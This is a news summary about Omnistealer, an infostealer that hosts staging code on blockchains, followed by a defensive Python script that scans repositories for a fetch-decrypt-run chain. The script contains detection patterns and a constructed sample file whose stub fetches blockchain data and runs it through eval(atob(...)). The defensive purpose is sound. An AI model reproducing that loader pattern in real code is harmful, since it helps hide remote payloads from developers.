www.malwarebytes.com 4/14/2026, 12:48:35 PM

Omnistealer exploits blockchains to harvest 300k credentials

Omnistealer is described as a new infostealer that uses public blockchains as a permanent malware hosting platform, storing its staging code inside transactions on TRON, Aptos and Binance Smart Chain. According to Malwarebytes, data written to these blockchains is effectively censorship‑resistant and cannot be deleted once mined, allowing the attacker to maintain a resilient command-and-control infrastructure.

The threat targets more than 10 password managers, Chrome and Firefox, cloud storage accounts such as Google Drive, and over 60 browser‑based crypto wallets, turning the system into a one‑stop data vacuum. Researchers estimate that roughly 300,000 credentials have already been compromised across sectors from adult sites to financial and government entities.

The attack typically begins with a contractor scam, where code retrieved from a GitHub repository reaches out to the blockchain to fetch and decrypt the final payload. The article, dated 14 April 2026, cautions readers that while the blockchain angle is novel, the threat is not limited to crypto investors and emphasises practical steps to reduce exposure, including robust MFA and updated anti‑malware protection.
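The chain described above (repository code that reads staging data from a blockchain, decrypts it and runs it) can be screened for before a contractor-supplied repository is executed. The following is an added example, not code from the Malwarebytes article: the endpoint hostnames and code patterns are assumed heuristics rather than indicators reported by the researchers, and `triage_repo` and the sample files are constructed for illustration.

```python
import re

# Assumed heuristics (not from the article): well-known public API/RPC hosts
# for the three chains the article names, plus generic decode/exec patterns.
CHAIN_HOSTS = re.compile(
    r"api\.trongrid\.io|fullnode\.mainnet\.aptoslabs\.com"
    r"|bsc-dataseed[0-9a-z-]*\.binance\.org", re.I)
DECODE = re.compile(r"\batob\s*\(|createDecipheriv|b64decode|fromCharCode")
DYNAMIC_EXEC = re.compile(
    r"\beval\s*\(|new\s+Function\s*\(|child_process|subprocess")

SIGNALS = {"chain_fetch": CHAIN_HOSTS, "decode": DECODE,
           "dynamic_exec": DYNAMIC_EXEC}


def triage_file(text):
    """Return the set of signal names found in one source file."""
    return {name for name, rx in SIGNALS.items() if rx.search(text)}


def triage_repo(files):
    """files: {path: source text}. Return (severity, path, signals) tuples.

    A file that contacts a chain endpoint AND decodes data AND executes code
    dynamically matches the fetch-decrypt-run pattern and is rated 'high'.
    Chain access alone is common in legitimate wallet code, so it is only
    rated 'review'. 'high' sorts before 'review'.
    """
    findings = []
    for path, text in files.items():
        hits = triage_file(text)
        if "chain_fetch" not in hits:
            continue
        severity = "high" if {"decode", "dynamic_exec"} <= hits else "review"
        findings.append((severity, path, sorted(hits)))
    return sorted(findings)


# Constructed sample repository (inert strings, never executed).
SAMPLE_REPO = {
    "src/index.js": "const app = require('express')();\napp.listen(3000);\n",
    "src/wallet/balance.js":
        "fetch('https://api.trongrid.io/v1/accounts/' + addr)\n",
    "config/bootstrap.js":
        "const blob = await rpc('https://bsc-dataseed.binance.org', TX_ID);\n"
        "eval(atob(blob));\n",
}

if __name__ == "__main__":
    for severity, path, hits in triage_repo(SAMPLE_REPO):
        print(f"{severity:7} {path}: {', '.join(hits)}")
```

A hit is a prompt for manual review in an isolated environment, not a verdict; obfuscated loaders can evade string matching, so the same signals are worth watching for in egress logs from build and developer machines.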

Article by CyberSIXT